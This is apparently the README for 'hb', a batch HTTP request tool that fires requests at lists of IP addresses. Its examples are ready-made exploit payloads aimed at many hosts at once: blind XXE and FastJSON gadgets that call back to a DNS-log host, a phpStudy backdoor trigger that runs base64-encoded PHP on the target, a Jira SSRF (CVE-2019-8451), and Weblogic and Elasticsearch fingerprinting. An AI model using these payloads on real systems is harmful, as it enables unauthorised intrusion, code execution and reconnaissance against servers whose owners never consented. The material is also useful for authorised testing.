Awesome

hb

Fast http batch request tool

Installing

bash build.sh

Example

Load File Target

./hb -f ips.txt -p 80

Add HTTP Header

-H "Host: bypasscdn"

Show ProgressBar

-pg

Follow redirect (30x)

-redirect

Filter Response Body

-grep "admin"

Filter Response Header (X-Powered-By ContentType Title)

-filter "nginx"

Filter Response Status Code

-code 2 # 2xx

Show Resposne Body

-response

Shuffle Request

-random

Send Post Request

-body "a=1&b=2&c=2"

# post body from file
-bodyfile ./exploit

Send PUT Request

-method PUT

Show Request Error

-debug 

Elasticsearch

-p 9200 -path "/_cat" -grep "/_cat/allocation"

PHPINF0

-path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'

XXE Blind

-body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace

FastJSON Blind

-H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect

Weblogic fingerprint

-p 7001 -H "Authorization: Basic" -code 401

phpStudy Backdoor

-H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -grep 'PHP Version' -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect

CVE-2019-8451 Jira SSRF

-path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect